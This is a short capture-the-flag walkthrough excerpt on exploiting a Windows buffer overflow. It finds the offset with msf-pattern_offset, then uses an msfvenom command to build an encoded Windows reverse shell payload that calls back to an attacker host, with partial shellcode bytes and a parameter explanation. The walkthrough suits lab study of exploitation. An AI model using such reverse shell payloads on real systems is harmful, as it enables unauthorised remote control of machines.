Use msf-pattern to find offset when buffer overflow has been achieved:
root@kali:/home/kali/thm/brainstorm#msf-pattern_offset-l2500-q31704330[*] Exact match at offset 2012
Create shellcode using MSFVenom:
root@kali:/home/kali/thm/brainstorm#msfvenom-pwindows/shell_reverse_tcpLHOST=192.168.0.20LPORT=1234EXITFUNC=thread-fpy-ex86/shikata_ga_nai-b"\x00"[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x86 from the payloadFound1compatibleencodersAttemptingtoencodepayloadwith1iterationsofx86/shikata_ga_naix86/shikata_ga_naisucceededwithsize351 (iteration=0)x86/shikata_ga_naichosenwithfinalsize351Payloadsize:351bytesFinalsizeofpyfile:1712bytesbuf=b""buf+=b"\xba\x40\xfd\xb6\x4c\xd9\xe9\xd9\x74\x24\xf4\x58\x31"buf+=b"\xc9\xb1\x52\x83\xc0\x04\x31\x50\x0e\x03\x10\xf3\x54"buf+=b"\xb9\x6c\xe3\x1b\x42\x8c\xf4\x7b\xca\x69\xc5\xbb\xa8"
Those parameters explained:
-p windows/shell_reverse_tcp = Payload is a Windows reverse shell
LHOST=192.168.0.20 = IP to connect back to is my Kali machine
LPORT=1234 = Port to connect to on Kali
-f py = Output payload in python for our script
-e x86/shikata_ga_nai = Which encoder to use
-b "\x00" = Bad characters to avoid
Walkthroughs here for reversing/binary exploitation: